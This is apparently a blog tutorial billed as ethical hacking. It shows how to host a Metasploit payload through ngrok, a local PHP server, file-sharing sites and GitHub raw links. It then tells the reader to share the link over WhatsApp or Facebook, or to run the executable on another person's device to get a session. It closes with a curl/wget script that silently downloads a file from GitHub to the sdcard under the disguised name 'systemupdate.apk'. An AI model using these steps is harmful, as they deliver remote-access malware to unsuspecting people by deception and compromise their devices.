☰

Host payload or a file online for quick access and Exploit | Ethical hacking tutorial

EFX TV
January 18, 2022
Today we are going to learn

How to host a payload for quick access using WGET or CURL command?

in linux or termux. To get the payload hosted you need a payload first. Generate a payload using Metasploit or using the tools you want and follow the steps below.
 Host payload or a file online for quick access and Exploit
Step 1: Generate payload using portmap.io for persistence connection.
Step 2: You can use
a) Ngrok (Wide Are Anetwork) will take time
1- You have to create an HTML file remove the filename with your payload name.
2- Setup Ngrok and auth tocken
3- Copy ngrok executable, html file, and payload in the same directory.
Open two terminals in the same directory where you have pasted all the files.
4- Type the commands in both of the Terminal one by one.
Terminal1 
php -S localhost:8080
Terminal2 
./ngrok http localhost:8080
5- Copy the link (starts from HTTPS) from terminal 2 and share the link via WhatsApp or Facebook.
b) Snapdrop (Local area network) file.io (WAN)
1- Open your favourite browser
2- Go to snapdrop.net
3- Open the same in another device connected to same network (router) (fileio for outside the network)
4- Choose the news device visible on your mobile, select the file and upload.
5- Download it from another device.
c) ssavr (Localarea link sharing) will take time
1- Open a terminal
2- Keep HTML file(we saw above) and payload in the same directory
3- Check your local IP by running command ifconfig on the terminal
4- Run the command to create a local server php -S 192.168.1.5:8080 (change 192.16... with your local IP)
5- Open the link (use chrome or firefox) on another device http://192.168.1.5:8080 (under same wifi network)
6- Download the file
d) GitHub (For sharing in LAN WAN both)
This is the best method of sharing a payload or any file over the internet. It will help to host the file 24*7. As we talked about static payload. Static means payload will never change its IP and port. This means you can install it on any device and get the session on your Metasploit listener.
1- Create an account on GitHub
2- Create a new repository and upload the file.
3- Go to the same repository click on raw or long-press it to copy the link and share it with anyone. Or go to the person's device and open the browser look for your repository and download the executable and quick execution. As soon as you execute the payload you'll get the session.
4- You do not have to do this thing again and again. Just remember your GitHub profile link open it and you are done.
e) By using curl and WGET command
1- Open a terminal.
2- Create a bash script and save it as file.sh. Make sure there are two methods the WGET is commented on. Uncomment one of them to use it. Remove https... with your link.
#!/bin/bash
curl -L -o /sdcard/systemupdate.apk https://github.com/efxtv/EMSF/blob/main/termux/emsf?raw=true -s
#wget https://github.com/efxtv/EMSF/blob/main/termux/emsf?raw=true -q
3- Once this script gets executed device will automatically download the file and save it to /sdcard/